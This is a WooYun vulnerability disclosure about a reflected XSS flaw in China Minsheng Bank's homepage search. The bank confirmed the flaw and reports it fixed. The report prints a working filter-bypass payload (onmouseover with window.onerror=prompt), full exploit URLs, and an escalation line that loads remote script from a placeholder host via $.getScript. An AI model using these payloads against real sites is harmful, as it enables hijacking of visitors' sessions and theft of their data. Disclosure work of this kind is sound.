当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118139

漏洞标题:民生银行主页xss漏洞(突破xss过滤器)

相关厂商:中国民生银行

漏洞作者: 老曹哥哥

提交时间:2015-06-04 10:19

修复时间:2015-07-02 12:43

公开时间:2015-07-02 12:43

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-02: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

在民生银行主页办点业务,看见主页上方有个巨大的搜索框就测了一把

详细说明:

条件所限,不能发图请见谅
当在搜索框中输入一些字符的时候,发现其返回到了页面的诸多地方。有标签中的,也有js中。
但是经过仔细测试,发现这里虽然没有过滤单引号,但是过滤了其他诸如"<>\&#,甚至(){}以及alert等js部分函数名。对我们闭合语法触发poc造成了一定困难。
仔细挑选后,选择了如下返回点:

<a href="/cs/Satellite?c=Page&amp;cid=1375342064713&amp;pagename=cmbc%2FPage%2FTP_Sousuolayout&amp;rendermode=preview&amp;keyword=aaa&amp;thisPage=1">首页</a>


其中链接地址中的keyword是可控的,并且来自于请求的url中。
在输入框中输入如下内容: aaabbb' onmouseover='window.onerror=prompt;throw 1' b='
(空格要使用url编码,否则会被剔除)
生成如下url:http://www.cmbc.com.cn/cs/Satellite?c=Page&cid=1375342064713&pagename=cmbc%2FPage%2FTP_Sousuolayout&rendermode=preview&keyword=aaabbb%27onmouseover=%27window.onerror=prompt;throw%201%27%20b=%27&thisPage=1
页面返回结果经过浏览器处理后,如下:

<a b="&amp;thisPage=1" onmouseover="window.onerror=prompt;throw 1" href="/cs/Satellite?c=Page&amp;cid=1375342064713&amp;pagename=cmbc%2FPage%2FTP_Sousuolayout&amp;rendermode=preview&amp;keyword=aaabbb">首页</a>


当鼠标指向页面下方时,触发on事件代码执行。
利用:由于页面使用了jquery可以通过如下方式利用

<img src=1 onerror="window.onerror=$.getScript;throw 'https://xxxxx.js'">


PS:已经数不清第几次投稿了,跪求邀请码。如需回扣请将账号直接发至我邮箱- -!

漏洞证明:

http://www.cmbc.com.cn/cs/Satellite?c=Page&cid=1375342064713&pagename=cmbc%2FPage%2FTP_Sousuolayout&rendermode=preview&keyword=a%20b&thisPage=1

修复方案:

版权声明:转载请注明来源 老曹哥哥@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-04 16:56

厂商回复:

非常感谢对民生银行的关注,感谢提交漏洞。

最新状态:

2015-07-02:感谢对我们的关注,漏洞已经修复。